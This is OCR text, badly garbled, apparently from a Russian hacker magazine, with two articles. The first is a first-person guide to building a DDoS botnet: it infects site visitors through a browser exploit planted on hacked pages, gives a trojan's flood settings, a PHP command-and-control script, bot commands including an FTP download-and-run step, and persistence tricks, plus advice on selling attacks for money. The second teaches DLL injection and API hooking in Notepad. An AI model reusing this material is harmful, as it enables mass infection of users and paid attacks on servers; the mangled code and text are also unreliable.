массовое протроянивание машин простых 
юзеров, сидящих на скромных каналах и 
виндовой оси. Разумеется, для этого 
я использую один из распространенных 
виндовых багов либо банально проспамлю 
юзеров специальным, заранее подготовлен- 
ным трояном, чтобы превратить их тачки в 
своих ручных зверьков. Совершенно ясно, 
что каналы связи с инетом у большинства 
юзеров Сети гораздо уже, чем у крупных 
серверов, поэтому чтобы создать мощную 
армию ООоЗ-ботов, придется поломать нес- 
колько тысяч пользователей. С таким отря- 
дом вполне уже можно завалить и крупную 
добычу. Сейчас я покажу тебе, как лучше 
всего реализовать эту атаку на практике. 
Смоли лыжи, поехали! 
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А ГОТОВИМ БОЙЦО 

Прежде чем начинать ОБоЗ-атаку на 
тісго$о(Е.сот, необходимо как следует подго- 
товиться. Нужно найти подходящего ЭОоЗ- 
трояна, которым я буду заражать взломан- 
ные компьютеры. На самом деле найти что- 
то стоящее в интернете - дохлый номер, в 
чем я сам наглядно убедился за несколько 
часов непрерывного серфинга различных по- 
исковых машин, форумов и хакерских архи- 
вов. Ни одна из публичных тулз не подходи- 
ла мне по всем параметрам. Чего же я тре- 
бовал от ОБоЗ-софта? Прежде всего, нужно 
понимать, что чем скромнее размер выпол- 
няемого бинарника, тем лучше: троян дол- 
жен быть маленьким и юрким, чтобы его бы- 
ло проще установить и чтобы он не бросался 
сильно в глаза. Одновременно с этим тулза 
должна эффективно флудить жертву, засы- 
пая ее не по-детски пакетами, используя од- 
ну из классических сісіоз-технологий. Также 
очень важно, чтобы ботами можно было лег- 
ко управлять - армия из тысячи бойцов 
должна быть мобильной и послушной. Увы, 
ничего стоящего я в инете не нашел и посте- 
пенно вплотную подошел к мысли, что надо 
либо искать по знакомым что-то приватное, 
либо писать новый, оригинальный инстру- 
мент. Я потратил некоторое время на то, 
чтобы убедиться: расстаться с готовым 
инструментом для ддоса никто не спешит и 
найти подходящий вариант будет сложно - 
проще написать его самостоятельно. Однако 
я не знаток в системном программировании 
под ѴѴіпсіоѵѵз, поэтому обратился к Горлуму, 
который по старой дружбе подогнал офиген- 
ный сісіоз-инструмент, полностью подходя- 
щий под все мои требования. Выполняемый 
файл весит всего 7 килобайт, поэтому его 
будет легко впаривать. Впрочем, возможнос- 
тей у тулзы минимум: этот троян умеет орга- 
низовывать істр-ЯоосІ атаки, выполнять лю- 
бую команду для стсі и выводить пользова- 
телю текстовое сообщение в МздВох. На 
первый взгляд может показаться, что этого 
недостаточно. В самом деле, если уж захва- 
тывать тысячу компьютеров, то, может быть, 
стоит обеспечить какой-то более продуман- 
ный контроль над тачками? Однако при бли- 
жайшем рассмотрении оказывается, что и 
этого набора функций более чем достаточно. 
Действительно, при помощи команды Йр 
можно закачать на винчестер любой другой 



бинарник и легко его запустить. Так что ни- 
каких проблем не возникнет, если появится 
желание продвинуться дальше и по полной 
нагрузить захваченные тачки. 

Л БОЕЦ ГОТОВ! 

Итак, спустя пару часов после того как я 
постучался к Горлуму в ІСО, мне пришло 
письмо с исходными кодами и собранным 
бинарником ОБоЗ-бота. Настало время про- 
тестировать его и разобраться хотя бы пове- 
рхностно, как он работает. После непродол- 
жительного изучения программы на моем 
лице возникла удовлетворенная улыбка: все 
работает просто офигительно. В самом на- 
чале кода определяется несколько ключевых 
параметров, которые тебе надо будет поме- 
нять, если ты, вопреки предостережениям, 
захочешь повторить мои действия. Но преж- 
де чем вставать на эту шаткую дорожку, 
знай, что все это незаконно и попадает сра- 
зу под несколько статей Уголовного кодекса 
нашей великой державы. Кроме того, следу- 
ет знать, весь мой рассказ - выдумка уко- 
ловшегося наркомана, а любые совпадения - 
чистой воды случайность. Итак, в самом на- 
чале исходника есть следующие строки: 



Основные параметры 00о$-бота 



II адрес ѵѵеЬ-сервера 
ШпеѴЕВА00КЕ$$ "ігеб.іпіпш" 

II имя файла/скрипта 
Шіпе ѴѴЕВРИЕ "НоосГ 
II размер пакета 
Шіпе РАСКЕТ8І2Е 1000 
II частота отсылки пакетов 
Шіпе ЕНЕО 100 

Скажу несколько слов о каждом парамет- 
ре. Как я уже отмечал выше, троян самосто- 
ятельно получает команду, подключаясь к 
веб-серверу, урл которого определяется 
константой ШЖЮВЕЗЗ. Бот запрашивает 
на этом сервере документ с именем, храня- 
щимся в ѴѴЕВРИЕ, и, исходя из полученной 
там команды, выполняет некоторое 
действие. Как вариант - начинает флудить 
жертву пакетами длиной РАСКЕТЗІ2Е, отсы- 
лая их один раз во временной промежуток, 
определяемый параметром РВЕО. Дефолт- 
ные параметры отлично работают для сред- 
ней паршивости кабельных каналов, при ис- 
пользовании модемного соединения могут 



ДРУГИЕ СПОСОБЫ ВППРИВПНИЯ ТРОЯНОВ 

П омимо использования разнообразных сплойтов для ІЕ, оста- 
ются актуальными и другие способы для впаривания троя- 
нов. Например, можно устроить социально-инженерную рас- 
сылку по нескольким миллионам адресов, призывая запустить 
скорее екзешник из аттача, чтобы увидеть фотографии белоку- 
рой Насти на летнем отдыхе. Также можно воспользоваться 
технологией Тоісіег зріой, о которой N50 писал в одном из пре- 
дыдущих номеров X, - это заметно повысит эффективность тво- 
их рассылок. И что бы ни говорили, спрос на генераторы карт 
Ьее+ все никак не уменьшится. В свое время при помощи де- 
бильного сайта, все усилия по раскрутке которого заключались 
в том, что я зарегал его в поисковике, я получал примерно 10 
новых диалап-паролей вдень. Так что же мешает заняться этим 
и сейчас, впаривая ООоЗ-троянов? 




возникнуть некоторые проблемы, поэтому 
может быть целесообразно уменьшить длину 
пакета и увеличить параметр РРЕО. Но это 
уже твое дело :). Как тебе, надеюсь, понят- 
но, в качестве файла с заданием может выс- 
тупать не просто текстовик, но и любой сце- 
нарий - ведь ѵѵеЬ-сервер отдает клиенту 
текстовый вывод этого скрипта, а ББоЗ-боту 
нет никакой разницы, с чем работать. По 
этой причине целесообразно для удобства 
написать несложный ріір-сценарий для уп- 
равления ботами и сборки статистики. Я не 
стану тебя особенно грузить и просто приве- 
ду здесь содержимое этого скрипта, который 
я написал за 5 минут: 



Скрипт для управления ботами 



<? 

іТ(і5$еЦ$_6ЕТ[$Іа])) { /* Конфигурируем ботов */ 

Есііо "<Іі1>СопТідигіпд апб $іаі$ аЬоиі ЛЛо$ ЬоІ$</П1> м ; 
іТ(і$$еЦ$_6ЕТ[$иЬ])) { /* Если форма с новым заданием отп- 
равлена, открываем файл и перезаписываем содержимое */ 
$Тр=Тореп("соттап(].(]Ь", V); 
іІ(Ллігііе($Ер, $_6ЕТ[спі(]])) есііо "Сопнпапб ирбаіебНЬр"; 

} 




л Все действия ха- 
кера в данной 
статье вымышле- 
ны, любые совпа- 
дения - случай- 
ность. Помни, что 
незаконные 
действия караются 
законодатель- 
ством. 




л Исходный код 
описываемой в 
статье программы, 
созданной для 
проверки работос- 
пособности раз- 
личных сегментов 
сети, можно найти 
на нашем диске и 
сайте 

ііПр://ігес!.іпіпз.ги/ 

ха/. 



$Тр=Тореп("сотпіап(].(]Ь", "г"): /* Выводим форму для смены 
текущей команды */ 

$спкНгеаг0р, 100); 

есііо "Фпті асііоп=">"; 

есііо "<іприі іуре=ііі(1(]еп папіе=$іа ѵаіие=1>"; 

Есііо "Сиггепі сопнпапб і$: <іприі іуре=іехі паліе=спи1 
ѵаіие-$спк]'>"; 

есііо "<іприі іуре=$иііпііі пате=$иЬ ѵаІие=\"КеІге$іі!\""; 
есііо "</Тогт>"; 

} еі$е { /* Если бот запрашивает команду, выводим ему со- 
держимое файла, где она хранится, и записываем ір в спе- 
циальный файл *І 

$НПР_$ЕКѴЕК_ѴАК$[ І, КЕМОТЕ_АООК 11 ]; 

$Ер=1ореп("$1аШ", "а"); 

ЕѵѵгіШр, $НТТР_ЗЕРѴЕР_ѴАР5["РЕМ0ТЕ_А00Р"]); 

Л/ѵгііе($Ер, "\п"); 

$Тр=Тореп("соттап(].(іЬ", "г"): 

$спкНгеаг0р, 100); 
есііо $стсі; } 

?> 



Итак, мы создали систему контроля за ра- 
ботой ботов и сбора статистики. Теперь нас- 
тало время подготовить код эксплойта для 
затроянивания пользователей. Это совсем 
не сложно, вот увидишь :). 

Л ЗНСЫППЕМ К030ЧК0 

Если ты регулярно читаешь X, то помнишь, 
что год назад Куттер написал статью «Ослик 
ІЕ: залей через меня трояна». В ней он опи- 
сывал іаѵазсгірі-эксплойт, эксплуатирующий 
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взлом 




баг в непропатченном осле шестой версии, 
который запущен под ѴѴіпсІоѵѵз ХР. Сплойт 
можно вставить на какую-нибудь МтІ-стра- 
ницу похаканного сайта, и просматривающие 
ее уязвимые посетители будут протрояни- 
ваться. В самом деле, такой подход доволь- 
но производителен. Основная проблема зак- 
лючается в том, чтобы сломать какой-нибудь 
популярный ресурс с большой посещае- 
мостью. Хотя на самом -то деле сделать это 
не так уж и сложно. Мы не раз писали о 
серьезных проблемах с безопасностью даже 
в самых больших и коммерчески успешных 
проектах - что уж говорить про середнячков 
с посещаемостью 2-3 тысячи хостов в день? 
Действительно, сейчас в ходу очень много 
актуальных уязвимостей, да что там, порой 
можно найти узлы, на которых присутствуют 
тупые баги конца девяностых. Как бы то ни 
было, наша статья не о взломе серверов. Об 
этом тебе лучше почитать в других статьях 
этого номера, а сейчас настало время впа- 
рить нашего чудо-трояна посетителям взло- 
манного ресурса. Я специально не стал при- 
водить в журнале код сплойта, который реа- 
лизует эту задачу, поскольку, во-первых, все 
равно ты не будешь перебивать его со стра- 
ниц журнала руками, а во-вторых, мы уже 
печатали его в куттеровской статье. Сплоит 
ты можешь найти на сайте ігесІ.іпіп$.ги/ха/. Для 
его использования понадобится изменить в 
его коде путь для закачки. Это не должно 
вызвать затруднений, поскольку тело сплой- 
та хорошо прокомментировано. Я сохранял 
нашего трояна в ветку автозагрузки: как 
только юзер ребутнется, троян стартует, ско- 
пирует себя в зузІет32 под хитрым именем 
и сотрет из автозагрузки. Таким образом, 
пользователь ничего не заметит. Можно так- 
же заменить трояном файл с:\\Ргодгат 
РіІе5\\ѴѴіпсІоѵѵ5 Месііа РІауег\\ѵѵтрІауег.ехе - в 
этом случае юзер затроянится сразу после 
просмотра ѵѵеЬ-страницы. 

После того как я отредактировал нужным 
образом код эксплойта, я выбрал один из 
своих поломанных сайтов и изменил главную 
страницу, вставив злой код. Хотя сплоит и 
палил свою работу, пользователи не увидели 
ничего подозрительного и продолжили юзать 
популярный ресурс. А в это время в чреве 
ѴѴіпсІоѵѵз происходили необратимые процес- 
сы: загрузился и выполнился наш троян, на- 
дежно прописавшись в системе. После пере- 
загрузки он подключится к серверу, получит 
команду и начнет ее методично выполнять. 
Теперь оставалось только ждать, пока затро- 
янится достаточное количество пользовате- 




СХЕМЫ УПРОВПЕНИЯ ТРОЯНЯИИ 



С амые первые трояны банально открывали локальный порт и 
ждали входящих соединений, при этом хозяин трояна 
подключался к серверной части и делал свое злое дело. Но та- 
кой подход уже давно не жизнеспособен. Суди сам: большая 
часть пользователей спрятана за провайдерским файрволом 
и плюс к тому часто использует «серые» ір, которые натятся в 
инет шлюзом провайдера. Разумеется, такой подход кроме 
всего еще и дико неудобный. Ну представь: ты захватил тыся- 
чу компьютеров и тебе надо отдать ботам какую-то команду. 
Понадобится выполнить тысячу подключений, что создаст ку- 
чу геморроя и ненужного трафика. По этой причине такой под- 
ход умер в конце девяностых. Какие же есть еще варианты? По 
мере того как ІРС набирала популярность, многие программе- 
ры пришли к следующему решению этой проблемы. Любой 
троян являлся еще и ігс-ботом: подключался к ігс-сети, захо- 
дил на определенный канал и ждал команды хозяина. Это до- 
вольно рационально и удобно: вне зависимости от количества 
захваченных компьютеров отдавать команды проще простого, 
весь трафик берет на себя ігссі. Однако и здесь есть куча под- 
водных камней. Ну представь: на ігс-сервер подключается ты- 
сяча нежданных гостей и заходит на какой-то левый канал. Ко- 
нечно, это дело сразу попалят бдительные иркопы и канал зак- 
роют. Хотя, конечно, никто не мешает тебе попросту поднять 
собственный ігс-сервер :). 

Но самый популярный и рациональный способ заключается в 
использовании т.н. реверсивного подхода. Это когда сервер и 
клиент как бы меняются местами. В нашем случае троян как раз 
работает по этой схеме: раз в 30 минут он скачивает из интер- 
нета текстовый файлик с некоторой командой и выполняет ее. 
Таким образом, даже люди с «серыми» ір будут под нашим конт- 
ролем, а файл с командой можно разместить где угодно, на са- 
мом левом бесплатном хостинге - это совсем неважно. 



лей. По моим расчетам, примерно 20% по- 
сетителей используют уязвимые браузеры и 
являются моими клиентами. Это не так уж и 
мало, если вдуматься: в день сайт посещало 
примерно 1 5000 юзеров, получалось, что за 
сутки к моей армии должно прибавляться 
примерно 3000 бойцов. 

^ГОТОВИМСЯ К ПТПКЕ 

Сейчас настало время сделать небольшую па- 
узу и рассказать о том, как, собственно, уп- 
равлять ботами. В самом деле, какие коман- 
ды понимают наши бойцы? Тут все просто: 

* стсі- команда - выполняет команду для 
стандартного интерпретатора ѴѴіпсІоѵѵз. Напри- 
мер, можно заставить машину скачать из ине- 
та любой файл. Для этого необходимо соста- 
вить простенький сценарий для Йр-клиента и 
соединиться с узлом, используя этот скрипт: 

есііо Іодіп>1.стсІ 
есііо ра$$ѵѵ(І»1.стсІ 
есііо 6ЕТ Ше.ехе»1.спк1 
Іір -$:1.стс1 Іір.ІМги 

* Также можно повеселиться над затроянен- 
ными чуханами, выводя им на экран забавные 
сообщения. Для этого надо в файл с командой 
поместить следующее предложение: 

те$$ Ѵои ѵѵаз Мей, підда! 6гіЬ2: х_сгеѵѵ :) 

* И наконец, самая главная функция: за- 
пуск істр-флуд атаки. Это реализуется при 
помощи красноречивой команды ТІоосІ: 



ІІоой шѵшкер.ги 

После того как наш бот получит такую ко- 
манду, он начнет засыпать наш сервер істр- 
пакетами длиной 1 0 кб с частотой один па- 
кет в секунду. Это оптимальный параметр 
для чертей, сидящих на выделенном канале, 
и как это будет работать на диалапе, неизве- 
стно. С другой стороны, в исходном коде бо- 
та всегда можно подправить длину пакета и 
частоту отсылки, поэтому проблем не воз- 
никнет. Разумеется, вместо 127.0.0.1 нужно 
указать ір жертвы ОЭоЗ-атаки. 

Л В 0Т0К9! 

Увы, несмотря на все мои позитивные расче- 
ты, количество ботов не спешило увеличи- 
ваться. По всему выходило, что сплоит не 
работал должным образом. Была уже глубо- 
кая ночь, и разобраться с этим я решил 
завтра, тем более что под рукой не было 
уязвимой винды. Наутро я протестил свой 
вариант сплойта на бажной машине и понял, 
что не совсем корректно его использовал - в 
спешке забыл залить файл еггог.ізр. Однако 
к этому времени доступ к сайту, на котором 
я тестил сплоит вчера, был уже потерян, и я 
решил воспользоваться другим, менее посе- 
щаемым ресурсом. Я вспомнил о сайте, ко- 
торый ломал давным-давно, еще весной, - 
там была классическая зці-тіесйоп уязви- 
мость. Недолго думая, я набрал его адрес, 
поигрался с параметрами, и стало понятно, 
что баг еще живой. Я быстро добавил на 
главную страницу код эксплоита и принялся 
ждать. В этот раз все сработало на ура, и 



80 



уже в продаже 



КОК НО ЭТОЙ МОЖНО ЗОРЙБОТОТЬ? 

О ЭоЗ - очень прибыльное занятие. На моей памяти есть слу- 
чаи, когда за качественно выполненную работу заказчик 
предлагал несколько тысяч долларов. Разумеется, тут надо 
быть очень осторожным: следить, чтобы тебя не попалили офи- 
церы ФСБ, не кинули недобросовестные засранцы и чтобы ар- 
мия ботов работала четко и слаженно, оставляя вражеский сег- 
мент не удел, а заказчика - довольным и щедрым. Как только у 
тебя появится достаточный опыт в этом деле и соответствую- 
щие связи, проблем с заказами не будет. Более того, ты всег- 
да сможешь найти себе работенку на специальных форумах - 
например, на одном из кардерских сайтов. Обычно заказчик 
перед выполнением заказа просит продемонстрировать мощ- 
ность твоей армии на каком-то хосте непродолжительным флу- 
дом. И если его все устраивает, он видит, что ты в состоянии 
выполнить его заказ, он делает предоплату и наслаждается ре- 
зультатом. Это обычная и стандартная схема. Сколько брать за 
работу? Здесь все очень сильно зависит от заказчика, твоего 
чутья и умения общаться с людьми. Понятие «новичок без 
портфолио» здесь отсутствует как таковое - твои возможности 
легко проверяются заказчиком на любом сервере. Поэтому 
важно чувствовать, сколько готов отдать твой клиент. Разуме- 
ется, лучше завалить 1 0 сайтов, получив с каждого по 300 дол- 
ларов, чем один - за тысячу. Так что тут, как и везде, надо иметь 
голову и знать меру. Однако надо понимать, что договориться 
и сбить цену ты всегда успеешь, а вот поднять ее от первона- 
чального уровня уже не получится. 



оказалось, что примерно 10-15% посетите- 
лей используют уязвимую винду в отсут- 
ствие файрвола - и это через год (!) после 
выхода эксплойта. Через некоторое время в 
файле со статистикой по ботам накопилось 
примерно полторы сотни зараженных ір-ад- 
ресов, и можно было приступать к активным 
действиям. Но прежде давай сосчитаем, ка- 
кой канал нам по силам завалить. Предполо- 
жим, половина наших юзеров обладает ши- 
роким каналом в инет. Это вполне правдопо- 
добная цифра, поскольку для распростране- 
ния троянов я использовал англоязычный 
проект. Ну что же, в этом случае я вправе 
рассчитывать на то, что каждый из 75 чело- 
век будет съедать у жертвы 1 0 кб/сек. В 
этом случае суммарная мощность составит 
750 кб/сек. Хорошо, сделаем скидку на воз- 
можные лаги и глюки, пусть даже 400 кб/сек. 
Это уже очень неплохо и вполне достаточно, 
чтобы повалить сервер, висящий на шейпин- 
говом канале и не рассчитанный на большое 
количество запросов. Такая вот позитивная 
математика. Разумеется, я не какой-нибудь 
там уголовник и не стал потехи ради атако- 
вать серверы коммерческих предприятий. Я 
начал с тренировки на собственном хосте с 
небольшим каналом - и что ты думаешь? Че- 
рез некоторое время я напрочь потерял 
связь с ним, нельзя было достучаться ни до 
55Іі, ни до ѵѵеЬ-сервера. И тут я стал залож- 
ником собственной армии - дело в том, что я 
не мог отменить команду, пока не достучусь 
до веб-сервера :). Пришлось ждать добрые 
полчаса, пока сами боты не смогут обновить 
команду и перейдут в режим ожидания. Надо 
сказать, после этого опыта я еще раз убе- 
дился в справедливости слов, что не стоит 
рубить сук, на котором сидишь. Суммарный 
трафик на істр-счетчике моей машины сос- 
тавил примерно 170 метров, и, можно ска- 
зать, я сполна ощутил экономический ущерб 
ЭЭоЗ-атак :). Вот так вот. Не шали. □С 





Кто сильней - Яндекс или полторы сотни ботов? :) 
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ебе никогда не хотепось изненить работу чужой программы? Исправить досадную ошибку, не дожидаясь выхода новой версии, 
отучить игрушку от СО, не запезая в инет за патчем? Да это же проще простого! Сегодня я научу тебя управпять работой чужих 
программ, причем дпя этого тебе не потребуется гпубокого знания какого-либо языка программирования! 




ВНЕПРЕНИЕ ВЦ И ЗРМЕНР 0РІ-ВЫ30В0В В ШВ01Н8 



^программы иды 

юбая программа для ѴѴіпсІоѵѵз 
использует в работе опреде- 
ленный набор функций. Часть 
из них находится в ней самой, 
часть располагается в динами- 
чески подключаемых библио- 
теках. Если приложение состо- 
ит из единственного файла и 
не устанавливает вместе с собой набор ОН, 
это не значит, что библиотеки совсем не ис- 
пользуются. Программа наверняка использу- 
ет функции ѴѴіпсІоѵѵз АРІ, расположенные во 
множестве библиотек в каталоге зузІет32. 
Даже если в ней нет явных вызовов АРІ, они 
все равно используются. Любое приложение 
при запуске вызывает из библиотеки кег- 
пеІ32 функции для работы с памятью, опре- 
деления командной строки, параметров за- 
пуска, значений переменных окружения. Ког- 
да программа закрывается, вызывается 
функция ЕхіІРгосезз. Многие методы классов 
МРС или ѴСІ_ содержат вызовы ѴѴіпсІоѵѵз АРІ 
в своих алгоритмах. 

Для многих задач существуют свои АРІ- 
функции, например, для запуска программы 
используется СгеаІеРгосезз, а для записи в 
файл - ѴѴгііеРіІе. Зная, что делает програм- 
ма, мы можем узнать, какие АРІ она для это- 
го использует. Достаточно посмотреть раз- 
дел импорта программы в какой-нибудь спе- 
циальной утилите, например РЕ Тооіз. 




Раздел импорта - это специальный раздел 
в ехе-файле, где находится список загружае- 
мых программой библиотек и импортируе- 
мых функций. Когда программа запускается, 
загрузчик операционной системы проецирует 
в адресное пространство процесса все пере- 
численные в нем ОН и настраивает вирту- 
альные адреса всех требуемых функций. 

Л ПЕРЕПДРЕСПЦИЯ ВЫЗОВОВ 

Вызывая импортируемую функцию, процесс 
получает ее адрес из раздела импорта. Поэ- 
тому чтобы перехватить определенную функ- 
цию, надо лишь изменить ее адрес в этом 
разделе. Тем самым ты сможешь влиять на 
алгоритм программы: подделывать возвра- 
щаемый функцией результат и менять значе- 
ния переданных параметров. О том, как это 
сделать, рассказывается в книге Джеффри 



Рихтера «Создание эффективных Ш32-при- 
ложений». Суть алгоритма в следующем: те- 
бе необходимо внедриться в адресное прост- 
ранство подопытного процесса и выполнить 
в нем специальный код, который изменит 
раздел импорта так, что когда программа вы- 
зовет функцию АРІ, на самом деле вызовется 
твоя собственная функция. Код функции 
ВерІасеІАТЕпІгуІпОпеМосІ, выполняющий эту 
операцию, ты найдешь на диске - он слиш- 
ком большой, чтобы печатать его в журнале. 

Как принудить подопытный процесс вы- 
полнить твою функцию? Для начала процесс 
должен загрузить в свое адресное простран- 
ство библиотеку, которая и выполнит соот- 
ветствующий код. 

Л КОППЕИСЯ В БПОКНОТЕ 

Я продемонстрирую, как это делается, 

на тривиальном примере 
замены функции 
МеззадеВох в стандарт- 
ной утилите ѴѴіпсІоѵѵз - 
Блокноте. Когда пишешь 
в нем что-нибудь, а затем 
пытаешься выйти, не сох- 
ранив, Блокнот выдает 
тебе маленькое окошко 
с сообщением «Текст в 
файле ЫаЫаЫа.М был 
изменен. Сохранить из- 
менения?». 
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ОПЕРОЦИЯ «ПЕРЕКВОТ» 



ПРОЦЕДУРОПЕРіаСЕіаТЕЯТВѴІЯОЯЕИОО 

З та процедура, заменяющая ссылки на функцию в таблице 
импорта процесса, была взята из книги Рихтера. Чтобы она 
заработала, мне потребовалось немного изменить код. Страни- 
ца памяти может иметь тип защиты РАСЕ_ПЕАООІ\ІІ_Ѵ. В книге 
говорится, что ѴѴгіІвРгосеззМеплогу сама модифицирует атри- 
буты защиты страницы, куда происходит запись. Однако на са- 
мом деле это не так. Поэтому перед выполнением 
ѴѴгіІюРгосеззМеплогу пришлось добавить еще и вызов 
ѴігІиаІРгоІесІ: с параметром РАСЕПЕАОѴѴРІТЕ, чтобы случайно 
не вызвать ошибку ассезз ѵіоіаіюп. После записи в память сно- 
ва вызывается ѴіііиаІРгаІесІ: и восстанавливается исходный тип 
защиты. В коде процедуры используются функции, находящие- 
ся в ітадеМІр.сІІІ, а значит перед использованием надо подклю- 
чить к проекту файлы іпладеНІр.П и іпладеПІр.ІіЬ. Сам код проце- 
дуры ты найдешь на нашем диске. 



Неплохо было бы изменить содержание это- 
го сообщения на что-то поинтереснее. 

Я создал в ѴізиаІ ЗШсІіо два проекта: один 
для библиотеки, которая содержит функцию 
ПерІасеІАТЕпІгуІпОпеМосІ, другой для прог- 
раммы, которая будет выполнять необходи- 
мые процедуры по загрузке моей ЭІ_І_ в ад- 
ресное пространство подопытного процесса. 

Необходимо сразу определиться, какую 
именно функцию нужно заменить. Дело в 
том, что их на самом деле две: МеззадеВохА 
(работающая в кодировке АІМЗІ) и 
МеззадеВохѴѴ (в кодировке ІІпісобе). Мой 
Блокнот из состава ѴѴіпсІоѵѵз ХР использует 
именно ІІпісобе-версию. Поэтому в дальней- 
шем я должен буду везде указывать 
МеззадеВохѴѴ. 

В созданной мною библиотеке находятся 
три функции: главная функция ОІІМаіп, функ- 
ция для замены МеззадеВох (я называл ее 
МуМеззадеВохѴѴ) и ВерІасеІАТЕпігуІпОпеМосІ. 
В главной функции ОІІМаіп при загрузке 
(когда параметр иі геазоп Тог саІІ равен 
ОИ_РВОСЕЗЗ_АТТАСН) происходит поиск 
адреса процедуры МеззадеВохѴѴ в библио- 
теке изег32.сІІІ (которая уже загружена в ад- 
ресное пространство подопытного процес- 
са). Затем в функцию 

ВерІасеІАТЕпігуІпОпеМосІ передаются в каче- 
стве параметров: имя библиотеки, в которой 
находится заменяемая функция (изег32.сІІІ), 



адрес МеззадеВохѴѴ, найденный до этого, 
адрес функции МуМеззадеВохѴѴ и хэндл 
процесса поіераб.ехе. 

Моя функция МуМеззадеВохѴѴ имеет точ- 
но такой же список параметров, как и ориги- 
нальная МеззадеВохѴѴ, и такой же тип возв- 
ращаемого результата. С соответствием ти- 
пов нужно быть очень внимательным - если 
они не будут совпадать, процесс почти на- 
верняка вылетит с ошибкой. Моя функция 



вызывает оригинальный МеззадеВох, пере- 
давая ему те же самые параметры, за иск- 
лючением текста сообщения. Его я заменил 
на «Эй, чувак, ты забыл сохраниться» :). 

Второй проект занимается внедрением биб- 
лиотеки в Блокнот при его запуске. Для этого я 
использовал функцию СгеаІеВетоІеТІтеасІ. 

Эта функция запускает поток в адресном 
пространстве чужого процесса. Она присут- 
ствует только в ѴѴіпсІоѵѵз 2000/ХР, на платфор- 
ме 9х она не поддерживается. Я надеюсь, ты 
давно сменил старушку ѴѴіпсІоѵѵз 98 на более 
прогрессивную винду ХР? 

Сначала моя программа запускает Блок- 
нот, затем ищет адрес процедуры 
І_оасіиЬгагуА в библиотеке кегпеІ32.сІІІ. Имен- 
но эта процедура будет выполнена внутри 
Блокнота и заставит его загрузить нашу при- 
готовленную библиотеку, которая сделает 
все остальное. Также нужно еще передать в 
качестве параметра для І_оасИ_іЬгагу название 
библиотеки (я назвал ее хакІіЬ.сІІІ). Эта стро- 
ка обязательно должна находиться в адрес- 
ном пространстве Блокнота, иначе 
1_оасІ[_іЬгагу с большой долей вероятности 
вызовет в процессе ошибку нарушения дос- 
тупа. Чтобы этого избежать, я выделил для 
строки, содержащей имя библиотеки, па- 
мять в чужом процессе с помощью функции 
ѴііІиаІАІІосЕх, а затем записал в нее значение 
с помощью ѴѴгііеРгосеззМетогу. 

А ПР0ГР0НИ0 ПОД КОНТРОЛЕН 

Приготовления закончились. Теперь остается 
лишь запустить функцию І_оасИ_іЬгагу при по- 
мощи СгеаІеПетоІеТІігеасІ и ждать, когда 
программа завершится. Произойдет загрузка 




ЧІИ 

л Помни, экспери- 
менты по модифи- 
кации работы чу- 
жих программ 
обычно являются 
незаконными и на- 
рушают авторские 
права. 

-О- 

л За более под- 
робной информа- 
цией советую об- 
ратиться к книге 
Джеффри Рихтера, 
которую можно 
найти как в мага- 
зинах, так и в 
оцифрованном ви- 
де в Сети. 



С03Д0НИЕ 9Д0ПЕННЫХ ПОТОКОВ 



Д ля загрузки библиотеки в адресное пространство процесса я 
использовал функцию СгеаІеНеплоІеТТігеасІ. Это лишь одно 
из ее возможных применений. Функция дает возможность уп- 
равлять чужим процессом. Изначально она была рассчитана на 
применение в отладчиках и других инструментальных сред- 
ствах. Но ничто не мешает использовать ее в обычном приложе- 
нии. Параметры идентичны СгеаіеТІігеасІ, за исключением 
НРгосезз, через который передается хендл нужного процесса. 
Параметр ІрЗіагІАсІсІг определяет адрес функции потока. Он, 
разумеется, должен располагаться в адресном пространстве 
чужого процесса. 
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Блокнота и замена функции МеззадеВох. Те- 
перь ты можешь наблюдать измененный 
текст окошка подтверждения. 

Закончив с Блокнотом, я решил поиздевать- 
ся еще над какой-нибудь программой. Мне за- 
хотелось перехватить функцию СгеаІеРгосеззА, 
которая отвечает за запуск программ в файло- 
вом менеджере РАР. Тем самым я нарушил 
пункт 8 лицензии этой программы, в чем иск- 
ренне раскаиваюсь :). У меня уже был готов 
работающий исходник для Блокнота, и пере- 
делать его для РАР не составляло труда. 

Я заменил первый параметр функции 
СгеаіеРгосеззА на СДѵѵіппДпоІерасІ.ехе. 

В РАР'е это стало очень забавно работать: 
какой ехе-файл ни пытаешься запустить - 
всегда запускается Блокнот :). 

Л НЕ ВСЕ ТОК ПРОСТО 

Неудивительно, что у меня все получилось 
как по маслу, - ведь я тестировал программу 
в тепличных условиях. В реальности перехва- 
тить ту или иную функцию бывает не так-то 
легко. Вот какие могут возникнуть проблемы: 

О. Программа может быть сжата. Утили- 
ты для сжатия вроде ІІРХ обычно сжимают 
РЕ-файлы вместе с разделом импорта, пос- 
ле чего ты не сможешь в нем что-то менять. 
Для опытов с такими программами необхо- 
димо их сначала распаковать, благо в интер- 
нете навалом распаковщиков :). 

О. Программа может не содержать раз- 
дела импорта совсем, например если она 
написана на ассемблере или если состоит из 
байт-кода, а все функции за нее вызывает 
виртуальная машина ^аѵа, С#). 

®. Может использоваться динамическая 
загрузка. Программа может загружать библио- 
теку с помощью ЬоасНіЬгагу, а адрес функции 
получать через ОеІРгосАсІсІгезз. В этом случае 



книга ДЖЕФФРИ РИХТЕРО 

Н аписание этой статьи было бы невозмож- 
но без замечательной книги Джеффри 
Рихтера «Создание эффективных ѴѴІІ\І32-при- 
ложений с учетом специфики 64-разрядной 
версии ѴѴіпсІоѵѵз». Эта книга посвящена прог- 
раммированию серьезных приложений на 
МісгозоЙ ѴізиаІ С++ в операционных систе- 
мах ѴѴіпсІоѵѵз 2000 (32- и 64-разрядных вер- 
сий) и ѴѴіпсІоѵѵз 98 с использованием функций 
ѴѴіпсІоѵѵз АРІ. 

Эту книгу можно легко найти в магазинах, но если тебе не пон- 
равится ее цена, ищи ее электронную версию на просторах Се- 
ти. Книгу стоит скачивать только в целях ознакомления, так как 
оцифрованная версия содержит не все примеры программ, ко- 
торые должны идти на диске вместе с бумажным изданием, а 
также изобилует орфографическими ошибками (результат ска- 
нирования). Ошибки в исходниках могут очень затруднить их 
понимание. 

В книге ты найдешь еще несколько способов внедрения кода в 
удаленный процесс и подробнее ознакомишься со многими 
затронутыми в статье темами (процессы, потоки, управление 
виртуальной памятью, поддержка ЭІ_І_ и ІІпісосІе). 
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придется перехватывать уже ЬоасНіЬгагу и 
СеІРгосАсІсІгезз (которые точно будут в разделе 
импорта) и подставлять там нужные адреса. 

О. Иногда возникает необходимость заме- 
нить функцию, не зная ни списка ее парамет- 
ров, ни типа возвращаемого результата. Это 
может быть одна из недокументированных 
функций из пМІІ.сІІІ или какая-нибудь функция 
от программистов, создавших подопытную 
программу. Тебе придется полазить по интер- 
